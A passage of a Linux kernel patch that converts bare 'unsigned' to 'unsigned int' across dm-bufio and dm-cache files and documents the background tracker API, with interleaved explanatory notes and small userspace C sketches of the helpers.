+ 	struct dm_bufio_client *locked_client = NULL;
+ 	struct dm_bufio_client *current_client;
+ 	struct dm_buffer *b;
+-	unsigned spinlock_hold_count;
++	unsigned int spinlock_hold_count;
+ 	unsigned long threshold = dm_bufio_cache_size -
+ 		dm_bufio_cache_size / DM_BUFIO_LOW_WATERMARK_RATIO;
+ 	unsigned long loops = global_num * 2;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 7887f99b82bd5..c606e6bfc3f8b 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -17,7 +17,7 @@ struct bt_work {
+ };
+ 
+ struct background_tracker {
+-	unsigned max_work;
++	unsigned int max_work;
+ 	atomic_t pending_promotes;
+ 	atomic_t pending_writebacks;
+ 	atomic_t pending_demotes;
+@@ -29,7 +29,7 @@ struct background_tracker {
+ 	struct kmem_cache *work_cache;
+ };
+ 
+-struct background_tracker *btracker_create(unsigned max_work)
++struct background_tracker *btracker_create(unsigned int max_work)
+ {
+ 	struct background_tracker *b = kmalloc(sizeof(*b), GFP_KERNEL);
+ 
+@@ -155,13 +155,13 @@ static void update_stats(struct background_tracker *b, struct policy_work *w, in
+ 	}
+ }
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b)
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_writebacks);
+ }
+ EXPORT_SYMBOL_GPL(btracker_nr_writebacks_queued);
+ 
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b)
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_demotes);
+ }
+diff --git a/drivers/md/dm-cache-background-tracker.h b/drivers/md/dm-cache-background-tracker.h
+index 27ab90dbc2752..14d3d53dc77a3 100644
+--- a/drivers/md/dm-cache-background-tracker.h
++++ b/drivers/md/dm-cache-background-tracker.h
+@@ -12,19 +12,44 @@
+ 
+ /*----------------------------------------------------------------*/
+ 
++/*
++ * The cache policy decides what background work should be performed,
++ * such as promotions, demotions and writebacks. The core cache target
++ * is in charge of performing the work, and does so when it sees fit.
++ *
++ * The background_tracker acts as a go-between, keeping track of future
++ * work that the policy has decided upon and handing (issuing) it to
++ * the core target when requested.
++ *
++ * There is no locking in this, so calls will probably need to be
++ * protected with a spinlock.
++ */
++
+ struct background_work;
+ struct background_tracker;
+ 
+ /*
+- * FIXME: discuss lack of locking in all methods.
++ * Create a new tracker; it will not be able to queue more than
++ * 'max_work' entries.
++ */
++struct background_tracker *btracker_create(unsigned int max_work);
++
++/*
++ * Destroy the tracker. No issued-but-incomplete work should
++ * exist when this is called. It is fine to have queued but unissued
++ * work.
+  */
+-struct background_tracker *btracker_create(unsigned max_work);
+ void btracker_destroy(struct background_tracker *b);
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b);
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b);
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b);
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b);
+ 
+ /*
++ * Queue some work within the tracker. 'work' should point to the work
++ * to queue; it will be copied (ownership doesn't pass).  If pwork
++ * is not NULL then it will be set to point to the tracker's internal
++ * copy of the work.
++ *
+  * returns -EINVAL iff the work is already queued.  -ENOMEM if the work
+  * couldn't be queued for another reason.
+  */
+@@ -33,11 +58,20 @@ int btracker_queue(struct background_tracker *b,
+ 		   struct policy_work **pwork);
+ 
+ /*
++ * Hands out the next piece of work to be performed.
+  * Returns -ENODATA if there's no work.
+  */
+ int btracker_issue(struct background_tracker *b, struct policy_work **work);
+-void btracker_complete(struct background_tracker *b,
+-		       struct policy_work *op);
++
++/*
++ * Informs the tracker that the work has been completed and it may forget
++ * about it.
++ */
++void btracker_complete(struct background_tracker *b, struct policy_work *op);
++
++/*
++ * Predicate to see if an origin block is already scheduled for promotion.
++ */
+ bool btracker_promotion_already_present(struct background_tracker *b,
+ 					dm_oblock_t oblock);
+ 
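With the documentation added above, the intended lifecycle is: the policy queues work (which the tracker copies), the core target issues it, performs it, and finally completes it. A simplified, self-contained C model of that queue/issue/complete sequence (a fixed array stands in for the tracker's internal structures):

#include <stdio.h>
#include <string.h>

struct policy_work { int op; };

#define MAX_WORK 4
static struct policy_work queued[MAX_WORK];
static int nr_queued;

/* Queue a copy of the work (ownership does not pass to the tracker's caller). */
static int btracker_queue(const struct policy_work *w)
{
	if (nr_queued == MAX_WORK)
		return -1;
	queued[nr_queued++] = *w;	/* tracker keeps its own copy */
	return 0;
}

/* Hand out the next piece of work; -1 if there is none. */
static int btracker_issue(struct policy_work **w)
{
	if (!nr_queued)
		return -1;
	*w = &queued[0];
	return 0;
}

/* Forget a completed piece of work. */
static void btracker_complete(struct policy_work *w)
{
	(void)w;
	memmove(&queued[0], &queued[1], --nr_queued * sizeof(queued[0]));
}

int main(void)
{
	struct policy_work promote = { .op = 1 }, *w;

	btracker_queue(&promote);		/* policy decides */
	if (!btracker_issue(&w)) {		/* core target asks for work */
		printf("performing op %d\n", w->op);
		btracker_complete(w);		/* ...and reports completion */
	}
	return 0;
}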
+diff --git a/drivers/md/dm-cache-metadata.c b/drivers/md/dm-cache-metadata.c
+index 83a5975bcc729..f5b4c996dc05f 100644
+--- a/drivers/md/dm-cache-metadata.c
++++ b/drivers/md/dm-cache-metadata.c
+@@ -104,7 +104,7 @@ struct dm_cache_metadata {
+ 	refcount_t ref_count;
+ 	struct list_head list;
+ 
+-	unsigned version;
++	unsigned int version;
+ 	struct block_device *bdev;
+ 	struct dm_block_manager *bm;
+ 	struct dm_space_map *metadata_sm;
+@@ -129,7 +129,7 @@ struct dm_cache_metadata {
+ 	bool clean_when_opened:1;
+ 
+ 	char policy_name[CACHE_POLICY_NAME_SIZE];
+-	unsigned policy_version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int policy_version[CACHE_POLICY_VERSION_SIZE];
+ 	size_t policy_hint_size;
+ 	struct dm_cache_statistics stats;
+ 
+@@ -260,10 +260,10 @@ static int superblock_lock(struct dm_cache_metadata *cmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -727,7 +727,7 @@ static int __commit_transaction(struct dm_cache_metadata *cmd,
+  */
+ #define FLAGS_MASK ((1 << 16) - 1)
+ 
+-static __le64 pack_value(dm_oblock_t block, unsigned flags)
++static __le64 pack_value(dm_oblock_t block, unsigned int flags)
+ {
+ 	uint64_t value = from_oblock(block);
+ 	value <<= 16;
+@@ -735,7 +735,7 @@ static __le64 pack_value(dm_oblock_t block, unsigned flags)
+ 	return cpu_to_le64(value);
+ }
+ 
+-static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned *flags)
++static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned int *flags)
+ {
+ 	uint64_t value = le64_to_cpu(value_le);
+ 	uint64_t b = value >> 16;
+@@ -749,7 +749,7 @@ static struct dm_cache_metadata *metadata_open(struct block_device *bdev,
+ 					       sector_t data_block_size,
+ 					       bool may_format_device,
+ 					       size_t policy_hint_size,
+-					       unsigned metadata_version)
++					       unsigned int metadata_version)
+ {
+ 	int r;
+ 	struct dm_cache_metadata *cmd;
+@@ -810,7 +810,7 @@ static struct dm_cache_metadata *lookup_or_open(struct block_device *bdev,
+ 						sector_t data_block_size,
+ 						bool may_format_device,
+ 						size_t policy_hint_size,
+-						unsigned metadata_version)
++						unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd, *cmd2;
+ 
+@@ -855,7 +855,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version)
++						 unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd = lookup_or_open(bdev, data_block_size, may_format_device,
+ 						       policy_hint_size, metadata_version);
+@@ -890,7 +890,7 @@ static int block_clean_combined_dirty(struct dm_cache_metadata *cmd, dm_cblock_t
+ 	int r;
+ 	__le64 value;
+ 	dm_oblock_t ob;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	r = dm_array_get_value(&cmd->info, cmd->root, from_cblock(b), &value);
+ 	if (r)
+@@ -1288,7 +1288,7 @@ static bool policy_unchanged(struct dm_cache_metadata *cmd,
+ 			     struct dm_cache_policy *policy)
+ {
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 	size_t policy_hint_size = dm_cache_policy_get_hint_size(policy);
+ 
+ 	/*
+@@ -1339,7 +1339,7 @@ static int __load_mapping_v1(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1381,7 +1381,7 @@ static int __load_mapping_v2(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1513,7 +1513,7 @@ static int __dump_mapping(void *context, uint64_t cblock, void *leaf)
+ {
+ 	__le64 value;
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	memcpy(&value, leaf, sizeof(value));
+ 	unpack_value(value, &oblock, &flags);
+@@ -1547,7 +1547,7 @@ int dm_cache_changed_this_transaction(struct dm_cache_metadata *cmd)
+ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty)
+ {
+ 	int r;
+-	unsigned flags;
++	unsigned int flags;
+ 	dm_oblock_t oblock;
+ 	__le64 value;
+ 
+@@ -1574,10 +1574,10 @@ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty
+ 
+ }
+ 
+-static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < nr_bits; i++) {
+ 		r = __dirty(cmd, to_cblock(i), test_bit(i, bits));
+ 		if (r)
+@@ -1594,7 +1594,7 @@ static int is_dirty_callback(uint32_t index, bool *value, void *context)
+ 	return 0;
+ }
+ 
+-static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r = 0;
+ 
+@@ -1613,7 +1613,7 @@ static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits,
+ }
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits,
++			    unsigned int nr_bits,
+ 			    unsigned long *bits)
+ {
+ 	int r;
+@@ -1712,7 +1712,7 @@ static int write_hints(struct dm_cache_metadata *cmd, struct dm_cache_policy *po
+ 	int r;
+ 	size_t hint_size;
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 
+ 	if (!policy_name[0] ||
+ 	    (strlen(policy_name) > sizeof(cmd->policy_name) - 1))
+diff --git a/drivers/md/dm-cache-metadata.h b/drivers/md/dm-cache-metadata.h
+index 0905f2c1615e1..b40322bc44cf7 100644
+--- a/drivers/md/dm-cache-metadata.h
++++ b/drivers/md/dm-cache-metadata.h
+@@ -60,7 +60,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version);
++						 unsigned int metadata_version);
+ 
+ void dm_cache_metadata_close(struct dm_cache_metadata *cmd);
+ 
+@@ -96,7 +96,7 @@ int dm_cache_load_mappings(struct dm_cache_metadata *cmd,
+ 			   void *context);
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits, unsigned long *bits);
++			    unsigned int nr_bits, unsigned long *bits);
+ 
+ struct dm_cache_statistics {
+ 	uint32_t read_hits;
+diff --git a/drivers/md/dm-cache-policy-internal.h b/drivers/md/dm-cache-policy-internal.h
+index 56f0a23f698c0..8e49baa78dc19 100644
+--- a/drivers/md/dm-cache-policy-internal.h
++++ b/drivers/md/dm-cache-policy-internal.h
+@@ -85,7 +85,7 @@ static inline void policy_tick(struct dm_cache_policy *p, bool can_block)
+ }
+ 
+ static inline int policy_emit_config_values(struct dm_cache_policy *p, char *result,
+-					    unsigned maxlen, ssize_t *sz_ptr)
++					    unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	if (p->emit_config_values)
+@@ -112,18 +112,18 @@ static inline void policy_allow_migrations(struct dm_cache_policy *p, bool allow
+ /*
+  * Some utility functions commonly used by policies and the core target.
+  */
+-static inline size_t bitset_size_in_bytes(unsigned nr_entries)
++static inline size_t bitset_size_in_bytes(unsigned int nr_entries)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_entries, BITS_PER_LONG);
+ }
+ 
+-static inline unsigned long *alloc_bitset(unsigned nr_entries)
++static inline unsigned long *alloc_bitset(unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	return vzalloc(s);
+ }
+ 
+-static inline void clear_bitset(void *bitset, unsigned nr_entries)
++static inline void clear_bitset(void *bitset, unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	memset(bitset, 0, s);
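bitset_size_in_bytes() rounds the entry count up to whole machine words, so
100 entries take two 64-bit words (16 bytes) on a 64-bit build. A userspace
equivalent of the helpers above (dm_div_up() is assumed to be the usual
round-up division):

	#include <limits.h>
	#include <stddef.h>
	#include <stdio.h>

	#define BITS_PER_LONG (CHAR_BIT * sizeof(unsigned long))

	static size_t bitset_size_in_bytes(unsigned int nr_entries)
	{
		/* round up to a whole number of unsigned longs */
		return sizeof(unsigned long) *
		       ((nr_entries + BITS_PER_LONG - 1) / BITS_PER_LONG);
	}

	int main(void)
	{
		printf("%zu\n", bitset_size_in_bytes(100)); /* 16 on 64-bit */
		return 0;
	}
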
+@@ -154,7 +154,7 @@ void dm_cache_policy_destroy(struct dm_cache_policy *p);
+  */
+ const char *dm_cache_policy_get_name(struct dm_cache_policy *p);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p);
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p);
+ 
+ size_t dm_cache_policy_get_hint_size(struct dm_cache_policy *p);
+ 
+diff --git a/drivers/md/dm-cache-policy-smq.c b/drivers/md/dm-cache-policy-smq.c
+index a3d281fc14c3a..54343812223e8 100644
+--- a/drivers/md/dm-cache-policy-smq.c
++++ b/drivers/md/dm-cache-policy-smq.c
+@@ -23,12 +23,12 @@
+ /*
+  * Safe division functions that return zero on divide by zero.
+  */
+-static unsigned safe_div(unsigned n, unsigned d)
++static unsigned int safe_div(unsigned int n, unsigned int d)
+ {
+ 	return d ? n / d : 0u;
+ }
+ 
+-static unsigned safe_mod(unsigned n, unsigned d)
++static unsigned int safe_mod(unsigned int n, unsigned int d)
+ {
+ 	return d ? n % d : 0u;
+ }
+@@ -36,10 +36,10 @@ static unsigned safe_mod(unsigned n, unsigned d)
+ /*----------------------------------------------------------------*/
+ 
+ struct entry {
+-	unsigned hash_next:28;
+-	unsigned prev:28;
+-	unsigned next:28;
+-	unsigned level:6;
++	unsigned int hash_next:28;
++	unsigned int prev:28;
++	unsigned int next:28;
++	unsigned int level:6;
+ 	bool dirty:1;
+ 	bool allocated:1;
+ 	bool sentinel:1;
+@@ -62,7 +62,7 @@ struct entry_space {
+ 	struct entry *end;
+ };
+ 
+-static int space_init(struct entry_space *es, unsigned nr_entries)
++static int space_init(struct entry_space *es, unsigned int nr_entries)
+ {
+ 	if (!nr_entries) {
+ 		es->begin = es->end = NULL;
+@@ -82,7 +82,7 @@ static void space_exit(struct entry_space *es)
+ 	vfree(es->begin);
+ }
+ 
+-static struct entry *__get_entry(struct entry_space *es, unsigned block)
++static struct entry *__get_entry(struct entry_space *es, unsigned int block)
+ {
+ 	struct entry *e;
+ 
+@@ -92,13 +92,13 @@ static struct entry *__get_entry(struct entry_space *es, unsigned block)
+ 	return e;
+ }
+ 
+-static unsigned to_index(struct entry_space *es, struct entry *e)
++static unsigned int to_index(struct entry_space *es, struct entry *e)
+ {
+ 	BUG_ON(e < es->begin || e >= es->end);
+ 	return e - es->begin;
+ }
+ 
+-static struct entry *to_entry(struct entry_space *es, unsigned block)
++static struct entry *to_entry(struct entry_space *es, unsigned int block)
+ {
+ 	if (block == INDEXER_NULL)
+ 		return NULL;
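The entry space above trades pointers for small array indexes (the struct
entry fields earlier in this file are 28-bit), with INDEXER_NULL standing in
for NULL. A compact round-trip sketch; the INDEXER_NULL value mirrors the
kernel source and is an assumption here:

	#include <assert.h>
	#include <stddef.h>

	#define INDEXER_NULL ((1u << 28u) - 1u)	/* assumed sentinel */

	struct entry { int payload; };

	struct entry_space { struct entry *begin, *end; };

	static struct entry *to_entry(struct entry_space *es, unsigned int block)
	{
		return block == INDEXER_NULL ? NULL : es->begin + block;
	}

	static unsigned int to_index(struct entry_space *es, struct entry *e)
	{
		assert(e >= es->begin && e < es->end);
		return (unsigned int)(e - es->begin);
	}

	int main(void)
	{
		struct entry pool[4];
		struct entry_space es = { pool, pool + 4 };

		assert(to_index(&es, to_entry(&es, 2)) == 2);
		assert(to_entry(&es, INDEXER_NULL) == NULL);
		return 0;
	}
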
+@@ -109,8 +109,8 @@ static struct entry *to_entry(struct entry_space *es, unsigned block)
+ /*----------------------------------------------------------------*/
+ 
+ struct ilist {
+-	unsigned nr_elts;	/* excluding sentinel entries */
+-	unsigned head, tail;
++	unsigned int nr_elts;	/* excluding sentinel entries */
++	unsigned int head, tail;
+ };
+ 
+ static void l_init(struct ilist *l)
+@@ -252,23 +252,23 @@ static struct entry *l_pop_tail(struct entry_space *es, struct ilist *l)
+ struct queue {
+ 	struct entry_space *es;
+ 
+-	unsigned nr_elts;
+-	unsigned nr_levels;
++	unsigned int nr_elts;
++	unsigned int nr_levels;
+ 	struct ilist qs[MAX_LEVELS];
+ 
+ 	/*
+ 	 * We maintain a count of the number of entries we would like in each
+ 	 * level.
+ 	 */
+-	unsigned last_target_nr_elts;
+-	unsigned nr_top_levels;
+-	unsigned nr_in_top_levels;
+-	unsigned target_count[MAX_LEVELS];
++	unsigned int last_target_nr_elts;
++	unsigned int nr_top_levels;
++	unsigned int nr_in_top_levels;
++	unsigned int target_count[MAX_LEVELS];
+ };
+ 
+-static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
++static void q_init(struct queue *q, struct entry_space *es, unsigned int nr_levels)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	q->es = es;
+ 	q->nr_elts = 0;
+@@ -284,7 +284,7 @@ static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
+ 	q->nr_in_top_levels = 0u;
+ }
+ 
+-static unsigned q_size(struct queue *q)
++static unsigned int q_size(struct queue *q)
+ {
+ 	return q->nr_elts;
+ }
+@@ -332,9 +332,9 @@ static void q_del(struct queue *q, struct entry *e)
+ /*
+  * Return the oldest entry of the lowest populated level.
+  */
+-static struct entry *q_peek(struct queue *q, unsigned max_level, bool can_cross_sentinel)
++static struct entry *q_peek(struct queue *q, unsigned int max_level, bool can_cross_sentinel)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *e;
+ 
+ 	max_level = min(max_level, q->nr_levels);
+@@ -369,7 +369,7 @@ static struct entry *q_pop(struct queue *q)
+  * used by redistribute, so we know this is true.  It also doesn't adjust
+  * the q->nr_elts count.
+  */
+-static struct entry *__redist_pop_from(struct queue *q, unsigned level)
++static struct entry *__redist_pop_from(struct queue *q, unsigned int level)
+ {
+ 	struct entry *e;
+ 
+@@ -383,9 +383,10 @@ static struct entry *__redist_pop_from(struct queue *q, unsigned level)
+ 	return NULL;
+ }
+ 
+-static void q_set_targets_subrange_(struct queue *q, unsigned nr_elts, unsigned lbegin, unsigned lend)
++static void q_set_targets_subrange_(struct queue *q, unsigned int nr_elts,
++				    unsigned int lbegin, unsigned int lend)
+ {
+-	unsigned level, nr_levels, entries_per_level, remainder;
++	unsigned int level, nr_levels, entries_per_level, remainder;
+ 
+ 	BUG_ON(lbegin > lend);
+ 	BUG_ON(lend > q->nr_levels);
+@@ -426,7 +427,7 @@ static void q_set_targets(struct queue *q)
+ 
+ static void q_redistribute(struct queue *q)
+ {
+-	unsigned target, level;
++	unsigned int target, level;
+ 	struct ilist *l, *l_above;
+ 	struct entry *e;
+ 
+@@ -467,12 +468,12 @@ static void q_redistribute(struct queue *q)
+ 	}
+ }
+ 
+-static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
++static void q_requeue(struct queue *q, struct entry *e, unsigned int extra_levels,
+ 		      struct entry *s1, struct entry *s2)
+ {
+ 	struct entry *de;
+-	unsigned sentinels_passed = 0;
+-	unsigned new_level = min(q->nr_levels - 1u, e->level + extra_levels);
++	unsigned int sentinels_passed = 0;
++	unsigned int new_level = min(q->nr_levels - 1u, e->level + extra_levels);
+ 
+ 	/* try and find an entry to swap with */
+ 	if (extra_levels && (e->level < q->nr_levels - 1u)) {
+@@ -512,9 +513,9 @@ static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
+ #define EIGHTH (1u << (FP_SHIFT - 3u))
+ 
+ struct stats {
+-	unsigned hit_threshold;
+-	unsigned hits;
+-	unsigned misses;
++	unsigned int hit_threshold;
++	unsigned int hits;
++	unsigned int misses;
+ };
+ 
+ enum performance {
+@@ -523,7 +524,7 @@ enum performance {
+ 	Q_WELL
+ };
+ 
+-static void stats_init(struct stats *s, unsigned nr_levels)
++static void stats_init(struct stats *s, unsigned int nr_levels)
+ {
+ 	s->hit_threshold = (nr_levels * 3u) / 4u;
+ 	s->hits = 0u;
+@@ -535,7 +536,7 @@ static void stats_reset(struct stats *s)
+ 	s->hits = s->misses = 0u;
+ }
+ 
+-static void stats_level_accessed(struct stats *s, unsigned level)
++static void stats_level_accessed(struct stats *s, unsigned int level)
+ {
+ 	if (level >= s->hit_threshold)
+ 		s->hits++;
+@@ -556,7 +557,7 @@ static void stats_miss(struct stats *s)
+  */
+ static enum performance stats_assess(struct stats *s)
+ {
+-	unsigned confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
++	unsigned int confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
+ 
+ 	if (confidence < SIXTEENTH)
+ 		return Q_POOR;
+@@ -573,16 +574,16 @@ static enum performance stats_assess(struct stats *s)
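stats_assess() classifies the hit ratio in fixed point: with FP_SHIFT at 8
(as in this file; an assumption here), confidence lies in 0..256 and the
SIXTEENTH/EIGHTH cut-offs are 16 and 32, i.e. 6.25% and 12.5%. A worked
sketch; the Q_FAIR/Q_WELL branches follow the kernel source:

	#include <assert.h>

	#define FP_SHIFT  8
	#define SIXTEENTH (1u << (FP_SHIFT - 4u))	/* 16 */
	#define EIGHTH    (1u << (FP_SHIFT - 3u))	/* 32 */

	enum performance { Q_POOR, Q_FAIR, Q_WELL };

	static unsigned int safe_div(unsigned int n, unsigned int d)
	{
		return d ? n / d : 0u;
	}

	static enum performance assess(unsigned int hits, unsigned int misses)
	{
		unsigned int confidence = safe_div(hits << FP_SHIFT, hits + misses);

		if (confidence < SIXTEENTH)
			return Q_POOR;
		return confidence < EIGHTH ? Q_FAIR : Q_WELL;
	}

	int main(void)
	{
		/* 10 hits in 100 accesses -> 25/256, between the cut-offs */
		assert(assess(10, 90) == Q_FAIR);
		return 0;
	}
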
+ struct smq_hash_table {
+ 	struct entry_space *es;
+ 	unsigned long long hash_bits;
+-	unsigned *buckets;
++	unsigned int *buckets;
+ };
+ 
+ /*
+  * All cache entries are stored in a chained hash table.  To save space we
+  * use indexing again, and only store indexes to the next entry.
+  */
+-static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned nr_entries)
++static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned int nr_entries)
+ {
+-	unsigned i, nr_buckets;
++	unsigned int i, nr_buckets;
+ 
+ 	ht->es = es;
+ 	nr_buckets = roundup_pow_of_two(max(nr_entries / 4u, 16u));
+@@ -603,7 +604,7 @@ static void h_exit(struct smq_hash_table *ht)
+ 	vfree(ht->buckets);
+ }
+ 
+-static struct entry *h_head(struct smq_hash_table *ht, unsigned bucket)
++static struct entry *h_head(struct smq_hash_table *ht, unsigned int bucket)
+ {
+ 	return to_entry(ht->es, ht->buckets[bucket]);
+ }
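The hash table above chains entries through 28-bit hash_next indexes rather
than pointers, again with INDEXER_NULL as the terminator. A stripped-down
sketch of head insertion and lookup under that convention (the struct layout
and sentinel mirror the kernel source; buckets start out filled with
INDEXER_NULL):

	#include <stddef.h>
	#include <stdint.h>

	#define INDEXER_NULL ((1u << 28u) - 1u)

	struct entry {
		unsigned int hash_next:28;
		uint64_t oblock;
	};

	static void h_insert(unsigned int *buckets, struct entry *es,
			     unsigned int bucket, unsigned int i)
	{
		es[i].hash_next = buckets[bucket];	/* head insertion */
		buckets[bucket] = i;
	}

	static struct entry *h_lookup(unsigned int *buckets, struct entry *es,
				      unsigned int bucket, uint64_t oblock)
	{
		unsigned int i;

		for (i = buckets[bucket]; i != INDEXER_NULL; i = es[i].hash_next)
			if (es[i].oblock == oblock)
				return &es[i];
		return NULL;
	}

	int main(void)
	{
		struct entry es[2] = { { 0, 0 }, { 0, 42 } };
		unsigned int buckets[1] = { INDEXER_NULL };

		h_insert(buckets, es, 0, 1);
		return h_lookup(buckets, es, 0, 42) == &es[1] ? 0 : 1;
	}
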
+@@ -613,7 +614,7 @@ static struct entry *h_next(struct smq_hash_table *ht, struct entry *e)
+ 	return to_entry(ht->es, e->hash_next);
+ }
+ 
+-static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry *e)
++static void __h_insert(struct smq_hash_table *ht, unsigned int bucket, struct entry *e)
+ {
+ 	e->hash_next = ht->buckets[bucket];
+ 	ht->buckets[bucket] = to_index(ht->es, e);
+@@ -621,11 +622,11 @@ static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry
+ 
+ static void h_insert(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	__h_insert(ht, h, e);
+ }
+ 
+-static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock_t oblock,
++static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned int h, dm_oblock_t oblock,
+ 				struct entry **prev)
+ {
+ 	struct entry *e;
+@@ -641,7 +642,7 @@ static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock
+ 	return NULL;
+ }
+ 
+-static void __h_unlink(struct smq_hash_table *ht, unsigned h,
++static void __h_unlink(struct smq_hash_table *ht, unsigned int h,
+ 		       struct entry *e, struct entry *prev)
+ {
+ 	if (prev)
+@@ -656,7 +657,7 @@ static void __h_unlink(struct smq_hash_table *ht, unsigned h,
+ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ {
+ 	struct entry *e, *prev;
+-	unsigned h = hash_64(from_oblock(oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(oblock), ht->hash_bits);
+ 
+ 	e = __h_lookup(ht, h, oblock, &prev);
+ 	if (e && prev) {
+@@ -673,7 +674,7 @@ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ 
+ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	struct entry *prev;
+ 
+ 	/*
+@@ -689,16 +690,16 @@ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ 
+ struct entry_alloc {
+ 	struct entry_space *es;
+-	unsigned begin;
++	unsigned int begin;
+ 
+-	unsigned nr_allocated;
++	unsigned int nr_allocated;
+ 	struct ilist free;
+ };
+ 
+ static void init_allocator(struct entry_alloc *ea, struct entry_space *es,
+-			   unsigned begin, unsigned end)
++			   unsigned int begin, unsigned int end)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	ea->es = es;
+ 	ea->nr_allocated = 0u;
+@@ -742,7 +743,7 @@ static struct entry *alloc_entry(struct entry_alloc *ea)
+ /*
+  * This assumes the cblock hasn't already been allocated.
+  */
+-static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned i)
++static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned int i)
+ {
+ 	struct entry *e = __get_entry(ea->es, ea->begin + i);
+ 
+@@ -770,12 +771,12 @@ static bool allocator_empty(struct entry_alloc *ea)
